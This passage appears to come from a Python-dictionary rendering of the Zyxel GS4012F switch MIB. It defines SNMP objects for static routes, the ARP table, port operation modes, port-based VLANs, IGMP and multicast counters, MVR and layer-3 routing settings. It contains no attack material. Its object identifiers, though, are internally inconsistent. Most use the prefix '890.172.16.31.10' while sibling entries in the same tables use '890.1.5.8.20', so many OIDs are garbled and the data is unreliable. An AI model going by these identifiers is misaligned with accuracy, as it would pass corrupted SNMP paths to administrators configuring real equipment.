"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.3.5.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"dhcpRelayInfoEnable" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.20.3.5.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"staticRouteSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.21",
}, # node
"maxNumberOfStaticRoutes" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.21.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"staticRouteTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.21.2",
"status" : "current",
"description" :
"""""",
}, # table
"staticRouteEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.21.2.1",
"create" : "true",
"status" : "current",
"linkage" : [
"staticRouteIp",
"staticRouteMask",
],
"description" :
"""An entry in staticRouteTable.""",
}, # row
"staticRouteName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.21.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"staticRouteIp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.21.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"staticRouteMask" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.21.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"staticRouteGateway" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.21.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"staticRouteMetric" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.21.2.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"staticRouteRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.21.2.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInfo" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.22",
}, # node
"arpTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.22.1",
"status" : "current",
"description" :
"""""",
}, # table
"arpEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.22.1.1",
"status" : "current",
"linkage" : [
"arpIpAddr",
"arpMacVid",
],
"description" :
"""An entry in arpTable.""",
}, # row
"arpIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.22.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpIpAddr" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.22.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpMacAddr" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.22.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "MacAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpMacVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.22.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpType" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.22.1.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"static" : {
"nodetype" : "namednumber",
"number" : "1"
},
"dynamic" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readonly",
"description" :
"""1-static, 2-dynamic""",
}, # column
"portOpModeSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.23",
}, # node
"portOpModePortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.23.1",
"status" : "current",
"description" :
"""""",
}, # table
"portOpModePortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.23.1.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in portOpModePortTable.""",
}, # row
"portOpModePortFlowCntl" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.23.1.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"off" : {
"nodetype" : "namednumber",
"number" : "0"
},
"on" : {
"nodetype" : "namednumber",
"number" : "1"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"portOpModePortName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.23.1.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"ranges" : [
{
"min" : "0",
"max" : "32"
},
],
"range" : {
"min" : "0",
"max" : "32"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"portOpModePortLinkUpType" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.23.1.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"down" : {
"nodetype" : "namednumber",
"number" : "0"
},
"copper" : {
"nodetype" : "namednumber",
"number" : "1"
},
"fiber" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"portOpModePortIntrusionLock" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.23.1.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"portOpModePortLBTestStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.23.1.1.7",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"none" : {
"nodetype" : "namednumber",
"number" : "0"
},
"underTesting" : {
"nodetype" : "namednumber",
"number" : "1"
},
"success" : {
"nodetype" : "namednumber",
"number" : "2"
},
"fail" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readonly",
"description" :
"""This entry display latest loopback test status of port while performing loopback test.""",
}, # column
"portOpModePortCounterReset" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.23.1.1.8",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"enable" : {
"nodetype" : "namednumber",
"number" : "1"
},
"disable" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""This entry resets port counter.""",
}, # column
"portBasedVlanSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.24",
}, # node
"portBasedVlanPortListTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.24.1",
"status" : "current",
"description" :
"""""",
}, # table
"portBasedVlanPortListEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.24.1.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in portBasedVlanPortListTable.""",
}, # row
"portBasedVlanPortListMembers" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.24.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"Q-BRIDGE-MIB", "name" : "PortList"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"multicastPortSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.25",
}, # node
"multicastPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.25.1",
"status" : "current",
"description" :
"""""",
}, # table
"multicastPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.25.1.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in multicastPortTable.""",
}, # row
"multicastPortImmediateLeave" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.25.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"multicastPortMaxGroupLimited" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.25.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"multicastPortMaxOfGroup" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.25.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""0..255""",
}, # column
"multicastPortIgmpFilteringProfile" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.25.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"multicastPortQuerierMode" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.25.1.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"auto" : {
"nodetype" : "namednumber",
"number" : "1"
},
"fixed" : {
"nodetype" : "namednumber",
"number" : "2"
},
"edge" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readwrite",
"description" :
"""Specify query mode for each port""",
}, # column
"multicastStatus" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26",
}, # node
"multicastStatusTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.1",
"status" : "current",
"description" :
"""""",
}, # table
"multicastStatusEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.1.1",
"status" : "current",
"linkage" : [
"multicastStatusVlanID",
"multicastStatusPort",
"multicastStatusGroup",
],
"description" :
"""An entry in multicastStatusTable.""",
}, # row
"multicastStatusIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"multicastStatusVlanID" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.26.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"multicastStatusPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"multicastStatusGroup" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpCountTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.2",
"status" : "current",
"description" :
"""A count table of igmp query/report/leave message.""",
}, # table
"igmpCountEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.2.1",
"status" : "current",
"linkage" : [
"igmpCountIndex",
],
"description" :
"""An entry in igmpCountTable.""",
}, # row
"igmpCountIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Index of IgmpCountEntry. 0 means total count in whole system""",
}, # column
"igmpCountInQuery" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpCountInReport" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpCountInLeave" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpCountInQueryDrop" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.2.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpCountInReportDrop" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.2.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpCountInLeaveDrop" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.2.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpCountOutQuery" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.2.1.8",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpCountOutReport" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.26.2.1.9",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpCountOutLeave" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.2.1.10",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"multicastVlanStatusTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.3",
"status" : "current",
"description" :
"""""",
}, # table
"multicastVlanStatusEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.3.1",
"status" : "current",
"linkage" : [
"multicastVlanStatusVlanID",
],
"description" :
"""An entry in multicastVlanStatusTable.""",
}, # row
"multicastVlanStatusVlanID" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
      "oid" : "1.3.6.1.4.1.890.1.5.8.20.26.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"multicastVlanStatusType" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.3.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"dynamic" : {
"nodetype" : "namednumber",
"number" : "1"
},
"mvr" : {
"nodetype" : "namednumber",
"number" : "2"
},
"static" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"multicastVlanQueryPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.26.3.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"Q-BRIDGE-MIB", "name" : "PortList"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpFilteringProfileSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.27",
}, # node
"igmpFilteringMaxNumberOfProfile" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.27.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"igmpFilteringProfileTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.27.2",
"status" : "current",
"description" :
"""""",
}, # table
"igmpFilteringProfileEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.27.2.1",
"create" : "true",
"status" : "current",
"linkage" : [
"igmpFilteringProfileName",
"igmpFilteringProfileStartAddress",
"igmpFilteringProfileEndAddress",
],
"description" :
"""An entry in igmpFilteringProfileTable.""",
}, # row
"igmpFilteringProfileName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
      "oid" : "1.3.6.1.4.1.890.1.5.8.20.27.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpFilteringProfileStartAddress" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.27.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpFilteringProfileEndAddress" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
      "oid" : "1.3.6.1.4.1.890.1.5.8.20.27.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"igmpFilteringProfileRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
      "oid" : "1.3.6.1.4.1.890.1.5.8.20.27.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mvrSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.28",
}, # node
"maxNumberOfMVR" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.28.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"mvrTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
      "oid" : "1.3.6.1.4.1.890.1.5.8.20.28.2",
"status" : "current",
"description" :
"""""",
}, # table
"mvrEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
      "oid" : "1.3.6.1.4.1.890.1.5.8.20.28.2.1",
"create" : "true",
"status" : "current",
"linkage" : [
"mvrVlanID",
],
"description" :
"""An entry in mvrTable.""",
}, # row
"mvrVlanID" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
      "oid" : "1.3.6.1.4.1.890.1.5.8.20.28.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""1..4094""",
}, # column
"mvrName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.28.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mvrMode" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.28.2.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"dynamic" : {
"nodetype" : "namednumber",
"number" : "0"
},
"compatible" : {
"nodetype" : "namednumber",
"number" : "1"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mvrRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.28.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mvr8021pPriority" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.28.2.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""Set the 802.1p priority of control messages within MVR (0~7)""",
}, # column
"mvrPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.28.3",
"status" : "current",
"description" :
"""""",
}, # table
"mvrPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.28.3.1",
"status" : "current",
"linkage" : [
"mvrVlanID",
"dot1dBasePort",
],
"description" :
"""An entry in mvrPortTable.""",
}, # row
"mvrPortRole" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.28.3.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"none" : {
"nodetype" : "namednumber",
"number" : "1"
},
"source_port" : {
"nodetype" : "namednumber",
"number" : "2"
},
"receiver_port" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mvrPortTagging" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.28.3.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"maxNumberOfMvrGroup" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.28.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"mvrGroupTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
      "oid" : "1.3.6.1.4.1.890.1.5.8.20.28.5",
"status" : "current",
"description" :
"""""",
}, # table
"mvrGroupEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
      "oid" : "1.3.6.1.4.1.890.1.5.8.20.28.5.1",
"create" : "true",
"status" : "current",
"linkage" : [
"mvrVlanID",
"mvrGroupName",
],
"description" :
"""An entry in mvrGroupTable.""",
}, # row
"mvrGroupName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.28.5.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"mvrGroupStartAddress" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.28.5.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mvrGroupEndAddress" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.28.5.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"mvrGroupRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.28.5.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"layer3Setup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.29",
}, # node
"routerRipState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.29.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"routerIgmpState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.29.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"routerDvmrpState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
